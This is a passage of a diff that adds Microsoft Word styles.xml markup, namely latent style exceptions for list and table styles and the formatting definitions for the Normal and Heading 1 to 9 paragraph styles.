+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading"/>
+    <w:lsdException w:name="Light List"/>
+    <w:lsdException w:name="Light Grid"/>
+    <w:lsdException w:name="Medium Shading 1"/>
+    <w:lsdException w:name="Medium Shading 2"/>
+    <w:lsdException w:name="Medium List 1"/>
+    <w:lsdException w:name="Medium List 2"/>
+    <w:lsdException w:name="Medium Grid 1"/>
+    <w:lsdException w:name="Medium Grid 2"/>
+    <w:lsdException w:name="Medium Grid 3"/>
+    <w:lsdException w:name="Dark List"/>
+    <w:lsdException w:name="Colorful Shading"/>
+    <w:lsdException w:name="Colorful List"/>
+    <w:lsdException w:name="Colorful Grid"/>
+    <w:lsdException w:name="Light Shading Accent 1"/>
+    <w:lsdException w:name="Light List Accent 1"/>
+    <w:lsdException w:name="Light Grid Accent 1"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1"/>
+    <w:lsdException w:name="Medium List 1 Accent 1"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1"/>
+    <w:lsdException w:name="Dark List Accent 1"/>
+    <w:lsdException w:name="Colorful Shading Accent 1"/>
+    <w:lsdException w:name="Colorful List Accent 1"/>
+    <w:lsdException w:name="Colorful Grid Accent 1"/>
+    <w:lsdException w:name="Light Shading Accent 2"/>
+    <w:lsdException w:name="Light List Accent 2"/>
+    <w:lsdException w:name="Light Grid Accent 2"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2"/>
+    <w:lsdException w:name="Medium List 1 Accent 2"/>
+    <w:lsdException w:name="Medium List 2 Accent 2"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2"/>
+    <w:lsdException w:name="Dark List Accent 2"/>
+    <w:lsdException w:name="Colorful Shading Accent 2"/>
+    <w:lsdException w:name="Colorful List Accent 2"/>
+    <w:lsdException w:name="Colorful Grid Accent 2"/>
+    <w:lsdException w:name="Light Shading Accent 3"/>
+    <w:lsdException w:name="Light List Accent 3"/>
+    <w:lsdException w:name="Light Grid Accent 3"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3"/>
+    <w:lsdException w:name="Medium List 1 Accent 3"/>
+    <w:lsdException w:name="Medium List 2 Accent 3"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3"/>
+    <w:lsdException w:name="Dark List Accent 3"/>
+    <w:lsdException w:name="Colorful Shading Accent 3"/>
+    <w:lsdException w:name="Colorful List Accent 3"/>
+    <w:lsdException w:name="Colorful Grid Accent 3"/>
+    <w:lsdException w:name="Light Shading Accent 4"/>
+    <w:lsdException w:name="Light List Accent 4"/>
+    <w:lsdException w:name="Light Grid Accent 4"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4"/>
+    <w:lsdException w:name="Medium List 1 Accent 4"/>
+    <w:lsdException w:name="Medium List 2 Accent 4"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4"/>
+    <w:lsdException w:name="Dark List Accent 4"/>
+    <w:lsdException w:name="Colorful Shading Accent 4"/>
+    <w:lsdException w:name="Colorful List Accent 4"/>
+    <w:lsdException w:name="Colorful Grid Accent 4"/>
+    <w:lsdException w:name="Light Shading Accent 5"/>
+    <w:lsdException w:name="Light List Accent 5"/>
+    <w:lsdException w:name="Light Grid Accent 5"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5"/>
+    <w:lsdException w:name="Medium List 1 Accent 5"/>
+    <w:lsdException w:name="Medium List 2 Accent 5"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5"/>
+    <w:lsdException w:name="Dark List Accent 5"/>
+    <w:lsdException w:name="Colorful Shading Accent 5"/>
+    <w:lsdException w:name="Colorful List Accent 5"/>
+    <w:lsdException w:name="Colorful Grid Accent 5"/>
+    <w:lsdException w:name="Light Shading Accent 6"/>
+    <w:lsdException w:name="Light List Accent 6"/>
+    <w:lsdException w:name="Light Grid Accent 6"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6"/>
+    <w:lsdException w:name="Medium List 1 Accent 6"/>
+    <w:lsdException w:name="Medium List 2 Accent 6"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6"/>
+    <w:lsdException w:name="Dark List Accent 6"/>
+    <w:lsdException w:name="Colorful Shading Accent 6"/>
+    <w:lsdException w:name="Colorful List Accent 6"/>
+    <w:lsdException w:name="Colorful Grid Accent 6"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+  </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading1Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="007A100A"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:pageBreakBefore/>
+      <w:pBdr>
+        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="4472C4" w:themeColor="accent1"/>
+      </w:pBdr>
+      <w:spacing w:before="400" w:after="40" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="00549E"/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="160" w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="00549E"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="00549E"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading4Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading5">
+    <w:name w:val="heading 5"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading5Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0"/>
+      <w:outlineLvl w:val="4"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="22"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading6">
+    <w:name w:val="heading 6"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading6Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0"/>
+      <w:outlineLvl w:val="5"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading7">
+    <w:name w:val="heading 7"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading7Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0"/>
+      <w:outlineLvl w:val="6"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading8">
+    <w:name w:val="heading 8"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading8Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0"/>
+      <w:outlineLvl w:val="7"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:smallCaps/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading9">
+    <w:name w:val="heading 9"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading9Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="0"/>
+      <w:outlineLvl w:val="8"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:smallCaps/>
